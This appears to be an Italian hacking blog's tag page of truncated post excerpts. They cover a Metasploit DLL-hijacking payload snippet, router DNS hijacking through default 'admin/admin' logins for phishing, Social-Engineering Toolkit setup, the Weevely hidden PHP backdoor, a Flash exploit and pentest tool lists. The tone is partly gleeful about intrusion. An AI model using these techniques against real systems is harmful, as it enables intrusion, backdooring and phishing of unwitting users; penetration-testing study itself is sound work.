Categorie:


Translate:
Italiano flagInglese flagFrancese flagTedesco flagPortoghese flagSpagnolo flag

Tag: ‘tool’

Tools for search DLL Hijacking Vulnerabilities

settembre 2nd, 2010 by clshack

Maggiori info su questa vulnerabilità, le possiamo trovare qui:

[DLL Hijacking] Windows 7 and more application Remote code Exuction => metasplooit

Vediamo ora come cercare applicazioni vulnerabili :D


Sempre nell’articolo sopra citato, ho mostrato come con metasploit è possibile sfruttare questa vulnerabilità, sfruttando webdav, anche da remoto.

L’exploit creato da HD moore, sviluppatore metaploit è molto semplice.
Il codice che interessa a noi è:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end


(continua…)

Tags: , , , , , ,
Posted in Hacking, Software, Windows | 2 Comments »

[Remote-Router]Fake DNS and Phishing/Exploiting attack

agosto 29th, 2010 by clshack

In pochissimi, cambiano la password al router -.-’ per comodità si lascia quella di default, quella facile da ricordare o.O

User: admin
Password: admin

In questo modo, se il router è raggiungibile dall’esterno, oppure se un utente, riesce ad entrare nella nostra rete può sfruttando i dns effettuare attacchi mirati verso il vostro il pc :D
Gli attacchi vanno dal phishing:
Wiki:

In the field of computer security, phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging.

fino a per prendere il controllo remoto del pc vittima :D

Tutto questo sfruttando i dns.
Quando riusciamo ad entrare nei router, oltre a cambiare l’ssid del wifi in “Che stronzo che sie” / “Sei un merda” e stronzate varie possiamo cambiare i dns.
Ad esempio io ho quelli di google o.O

I server dns, volgarmente parlando, non fanno altro che restituire l’ip del sito internet a cui ci stiamo connettendo, ad esempio se digitiamo www.clshack.it:
; < <>> DiG 9.7.0-P1 < <>> www.clshack.it
;; global options: +cmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 29740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.clshack.it. IN A
;; ANSWER SECTION:
www.clshack.it. 31 IN A 94.141.22.26
;; Query time: 127 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Aug 19 19:12:04 2010
;; MSG SIZE rcvd: 48
Ci restituisce:
94.141.22.26
(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Programmazione, Software | 20 Comments »

[How To] Social Engineering Toolkit with Metasploit

giugno 27th, 2010 by clshack

Il Social-Engineering Toolkit (SET) è stato realizzato da David Kennedy e mette a disposizione degli attacker alcuni notevoli exploit, di tipo Social-Engineering con una comoda interfaccia :D

L’obiettivo principale di SET è la automazione di tali attacchi, sfruttando quasi sempre la stupidità umana.

Vediamo come utilizzarlo.
sudo apt-get install python-pexpect
Dobbiamo fare un link simbolico altrimenti non va SET se non abbiamo backtrack 4:
sudo -s
mkdir /pentest
mkdir /pentest/exploits/
mkdir /pentest/exploits/framework3/
sudo ln -s "WHERE_IS_METASPLOIT/*" /pentest/exploits/framework3/
Ad esempio:
sudo ln -s /home/clshack/msf3/* /pentest/exploits/framework3/


Andiamo nel terminale, e scarichiamo la versione più aggiornata:

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/
cd SET
sudo ./set
Una volta aperto, avremo un menù un po’ lamerico -.-’


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Vediamo nel dettaglio le opzioni.

1. Spear-Phishing Attack Vectors
Digitando 1, avremo sostanzialmente 3 opzioni:

  • Perform a Mass Email Attack
  • Create a FileFormat Payload
  • Create a Social-Engineering Template

(continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 8 Comments »

PHP backdoor with Weevely

giugno 25th, 2010 by clshack

Weevely è un tool studiato per creare e gestire una backdoor nascosta su webserver remoti php.

Weevely cifra le comunicazioni tra client e server dentro campi HTTP_REFERER plausibili per occultarsi a NIDS e a ricerche nei log del webserver.
Weevely permette di:


Generare la backdoor PHP cifrata dinamicamente

  • Eseguire comandi sulla shell remota, offuscando le richieste dentro HTTP_REFERER plausibili
  • Simulare un terminale per inviare comandi alla shell remota come sopra
  • Eludere alcune configurazioni di PHP che limitano l’esecuzione di comandi sul sistema
  • Eseguire moduli sulla macchina remota per automatizzare compiti.
  • Aggiungere nuovi moduli in maniera facile e veloce

Scritto in python e open source.
Per l’installazione su debian/ubuntu:
sudo apt-get install python-numpy
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 8 Comments »

[Python]WordPress brute force script :D

giugno 23rd, 2010 by clshack

Sicurezza sempre meno… colpa di chi ? Quasi sempre nostra… ad esempio un coglione H4, un po’ di tempo fa è entrato nel blog del nostro amico sskull.

Come ha fatto ?

Con un attacco brute force, il nostro amico sskull aveva lasciato una password un po’ troppo debole e quel merda di bambino è entrato…
(continua…)

Tags: , , ,
Posted in GNU/Linux, Hacking, Software | 12 Comments »

[tutorial]Tool for Privilege Escalation

giugno 23rd, 2010 by clshack

Letture consigliate:
[tutorial]Tool for Information Gathering
[tutorial]Tool for Network Mapping

[tutorial]Tool for Vulnerability Identification level Server
[tutorial]Tool for Vulnerability Identification level WEB

Da wikipedia, leggiamo:

Privilege escalation o in italiano scalata dei privilegi è l’atto di sfruttare una falla in un software applicativo per ottenere l’accesso a risorse che normalmente sarebbero protette da un’applicazione o dall’utente.
Il risultato è che l’applicazione esegue azioni con più privilegi di quelli dovuti e voluti dallo sviluppatore o dall’amministratore di sistema.


Pensate, ad esempio se su un server riuscissimo ad avere i privilegi root :D
In questo articolo, vedremo dei tools, che ci permettono di “scalare i privilegi”, cioè di ottenere privilegi root su linux e system su windows.
(continua…)

Tags: , , , , , , ,
Posted in GNU/Linux, Hacking, Software | 6 Comments »

[CVE-2010-1297]Metasploit:Flash Player 9x, 10.0 Remote code Excution

giugno 20th, 2010 by clshack

E dopo la gente, si chiede come fanno i virus ad entrare nei loro computer WINDOWS… fino che usate software buggati, per lo più lenti e schifosi, come flash player… speriamo che HTML 5 porti via tutto questo ;)

In tanto vediamo come sfruttare questa vulnerabilità per adobe flash palyer, con metasploit :D

Adobe Flash Player “newfunction” Invalid Pointer Use

CVE-2010-1297
This exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player.
Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code executiong is achieved by embedding a specially crafted Flash movie into a PDF document.
An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled.

Platforms Affected:

  • Adobe Acrobat 9.0 Standard
  • Adobe Acrobat 9.0
  • Adobe Acrobat 9.0.0
  • Adobe Acrobat 9.1
  • Adobe Acrobat 9.1 Standard

    • (continua…)

Tags: , , , , ,
Posted in GNU/Linux, Hacking, Software | 7 Comments »

[tutorial]Tool for Vulnerability Identification level WEB

giugno 19th, 2010 by clshack

Ed eccomi di nuovo, in questo articolo, parleremo di tool, per il penetration-test, a livello di applicazioni web.
Molte volte troviamo siti defacciati, beh non è sempre colpa dei cms vulnerabili, dipende anche da modifiche da noi apportate, che magari li rendono poco sicuri.
E dopo, vi trovate index cosi:

Dopo queste:
[tutorial]Tool for Information Gathering
 [tutorial]Tool for Network Mapping
[tutorial]Tool for Vulnerability Identification level Server

Vediamo ora come identificare vulnerabilità, a livello di web applications…
I tools, da me proposti sono i seguenti:

    ===WEB VULNERABILITY SCANNER===
  • Wapiti: Web application security Scanner
  • Grendel-Scan:web application security testing tool
  • SkipFish: Google security Scanner
  • Websecurify
  • w3af:Web Application Attack and Audit Framework
  • SqlMap
  • Fimap: Scanner LFI(Local File Inclusion ) and RFI(Remote File Inclusion)

    • ===FINGER PLUGIN AND VERSION===

  • WhatWeb
  • Plecost: A WordPress Penetration-Test for Plugins
  • OWASP Joomla Vulnerability Scanner

    • ===CODE ANALYTICS===

  • RIPS:source code analyser for vulnerabilities in PHP
  • RATS: Rough Auditing Tool for Security
  • Pixy

(continua…)

Tags: , , , , , ,
Posted in GNU/Linux, Hacking, Software | No Comments »

[tutorial]Tool for Vulnerability Identification level Server

giugno 9th, 2010 by clshack

Dopo queste:
[tutorial]Tool for Network Mapping
[tutorial]Tool for Information Gathering
Ora parleremo di Tool for Vulnerability Identification level Server.

Categoria distinta a livello server, non farò come in backtrack che mettono tutto assieme, tool per l’sql injection assieme a tool per l’exploited di vulnerabilità a livello server, cioènon di applicazzioni web, per quello che posso cerco di dividere.
Penso che dopo si capisca anche meglio…
Sicuramente, non metterò mai tool come wapiti insieme a tool come openvas.

Per questa categoria, ho selezionato questi tools:

  • nessus
  • openvas
  • Checkpwd
  • Nikto
  • OpenSSL-Scanner
  • Onesixtyone
  • ettercap
  • medusa2

Purtroppo non posso soffermarmi su tutti questi ottimi tool, comunque il loro funzionamento è abbastanza semplice :D e se googlate un po’ troverete :D
(continua…)

Tags: , , , , , ,
Posted in GNU/Linux, Software, Windows | 1 Comment »

[tutorial]Tool for Network Mapping

giugno 5th, 2010 by clshack

Abbiamo visto in precedenza questi tool:[tutorial]Tool for Information Gathering

Ora vedremo, come mappare una rete, per capire, a cosa ci troviamo difronte, macchine, sistemi operativi, servizi, router,firewall e quant’altro.

Ho selezionato per alcuni tool, che ritengo utili ad effettuare operazioni di network mapping ;)

Network Mapping:

  • Angry IP Scanner
  • AutoScan NetWork
  • LanMap
  • nMap
  • Traceroute
  • Ping

Ho praticamente già parlato di tutti questi tool sul blog, ma rivediamoli :D

Il primo tool, forse il meno conosciuto, Angry IP Scanner.

Angry IP Scanner, scritto in java, e presente in backtrack permette di scansionare un range di ip per capire quali sono attivi o meno.
Molto semplice da usare, grazie a una comoda interfaccia grafica :D

Riconosce se un pc attivo grazie ad un uso combinato di queste 3 tecniche:

  • ICMP ECHO [ping]
  • ICMP ECHO [alternative]
  • UDP packet
  • TCP port probe

(continua…)

Tags: , , , , , ,
Posted in GNU/Linux, Hacking, Software | 7 Comments »
« Older Entries